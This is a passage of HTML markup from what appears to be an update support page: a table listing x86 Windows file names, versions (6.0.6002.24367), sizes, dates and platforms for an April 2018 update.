faq-panel-heading=\"\">For all supported x86-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td><td><strong class=\"sbody-strong\">Service branch</strong></td></tr><tr><td>Halacpi.dll</td><td>6.0.6002.24367</td><td>138,944</td><td>28-Apr-2018</td><td>02:58</td><td>x86</td><td>Not applicable</td></tr><tr><td>Halmacpi.dll</td><td>6.0.6002.24367</td><td>170,176</td><td>28-Apr-2018</td><td>02:58</td><td>x86</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>380,928</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>401,408</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>266,240</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>376,832</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>356,352</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>348,160</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll</td><td>6.0.6002.24367</td><td>823,808</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Setbcdlocale.dll</td><td>6.0.6002.24367</td><td>46,592</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Winload.exe</td><td>6.0.6002.24367</td><td>1,016,512</td><td>28-Apr-2018</td><td>02:58</td><td>x86</td><td>Not applicable</td></tr><tr><td>Winresume.exe</td><td>6.0.6002.24367</td><td>931,520</td><td>28-Apr-2018</td><td>02:58</td><td>x86</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>02:38</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>02:37</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe</td><td>6.0.6002.24362</td><td>1,016,512</td><td>10-Apr-2018</td><td>19:44</td><td>x86</td><td>Not applicable</td></tr><tr><td>Winresume.exe</td><td>6.0.6002.24259</td><td>931,560</td><td>15-Dec-2017</td><td>14:05</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>10,240</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>02:40</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>10,240</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>10,240</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>10,752</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>8,192</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll</td><td>6.0.6002.24259</td><td>650,984</td><td>15-Dec-2017</td><td>14:05</td><td>x86</td><td>Not applicable</td></tr><tr><td>Driver.stl</td><td>Not applicable</td><td>4,349</td><td>15-Dec-2017</td><td>14:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll</td><td>6.0.6002.24367</td><td>1,321,472</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>X86_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Rpcss.dll</td><td>6.0.6002.24367</td><td>554,496</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>X86_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>4,096</td><td>28-Apr-2018</td><td>03:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>02:36</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:37</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Comcat.dll</td><td>6.0.6002.24367</td><td>7,168</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleres.dll</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>01:44</td><td>x86</td><td>Not applicable</td></tr><tr><td>Csrsrv.dll</td><td>6.0.6002.24367</td><td>49,664</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Kernel32.dll</td><td>6.0.6002.24367</td><td>896,000</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>229,376</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>159,744</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>245,760</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>286,720</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>196,608</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>233,472</td><td>28-Apr-2018</td><td>02:40</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>155,648</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>02:39</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>274,432</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>237,568</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>290,816</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:58</td><td>Not 